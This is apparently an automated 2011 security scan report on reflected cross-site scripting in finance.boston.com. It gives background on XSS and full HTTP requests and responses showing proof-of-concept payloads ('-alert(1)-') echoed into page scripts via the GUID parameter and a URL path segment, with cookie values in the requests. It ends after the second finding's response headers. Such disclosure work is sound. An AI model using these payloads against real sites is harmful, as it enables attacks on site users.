XSS, Cross Site Scripting, finance.boston.com, CWe-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 17 08:38:59 CDT 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://finance.boston.com/boston/news/read [GUID parameter]

1.2. http://finance.boston.com/boston/news/read [REST URL parameter 2]

1.3. http://finance.boston.com/boston/news/read [REST URL parameter 3]

1.4. http://finance.boston.com/boston/news/read [name of an arbitrarily supplied request parameter]

2. Source code disclosure

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. http://finance.boston.com/boston/news/NaN

4.2. http://finance.boston.com/boston/news/read

5. Email addresses disclosed


1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://finance.boston.com/boston/news/read [GUID parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/read

Issue detail

The value of the GUID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69eb6'-alert(1)-'0f690973006 was submitted in the GUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boston/news/read?GUID=1774439869eb6'-alert(1)-'0f690973006 HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; RMFD=011PrVUgO105wRm|O205ya3|O105yhs; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:45:01 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 16 Mar 2011 22:45:01 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 26180

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title> | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<style type="text/css">
#error {
padding: 0 5px;
}
#error .box {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
background: #254f7c;
padding: 1em;
_height: 164px;
min-height: 164px;
color: #fff;
font-size: 1.5em;
position: relative;
}
#error .box.gray {
background: #2a2a2a;
}
#error .box .box_inner {
margin-top: 180px;
}
#error .box .icon {
height: 164px;
width: 164px;
position: absolute;
top: 20px;
left: 20px;
background: url(http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png) no-repeat top left;
_filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png', sizingMethod='image');
_background: transparent;
}
#error .box h3 {
color: #fff;
margin: 0;
padding: 0;
font-size: 2.0em;
    line-height: 2.0em;
font-weight: bold;
}
#error .box h3 strong {
color: #7cc45e;
text-transform: uppercase;
}
#error .box.gray h3 strong {
color: #718ba9;
}
#error .box .error-info {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
padding: 1em;
background: #395F88;
}
#error .box.gray .error-info {
background: #3d3d3d;
}
#error .box.gray .error-detail {

}
</style>
<!-- /404 STYLING -->

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="50%" valign="top">
<div class="widget fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
</td>
<td width="50%" valign="top">
<div id="error">
<div class="box error">
<div class="box_header">
<div class="box_corner"></div>
</div>
<div class="icon"></div>
<div class="box_inner">
<h3><strong>Error:</strong> 404</h3>
<div class="error-info">
The page you requested cannot be found - please try one of the links above.
</div>
</div>
<div class="box_footer">
<div class="box_corner"></div>
</div>
</div>
</div>
</td>
</tr>
</table>




</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnews%2Fread%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff%26GUID%3D1774439869eb6'-alert(1)-'0f690973006&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




1.2. http://finance.boston.com/boston/news/read [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/read

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2414'-alert(1)-'9b8d827bc87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boston/newse2414'-alert(1)-'9b8d827bc87/read?GUID=17744398 HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; RMFD=011PrVUgO105wRm|O205ya3|O105yhs; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:45:17 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
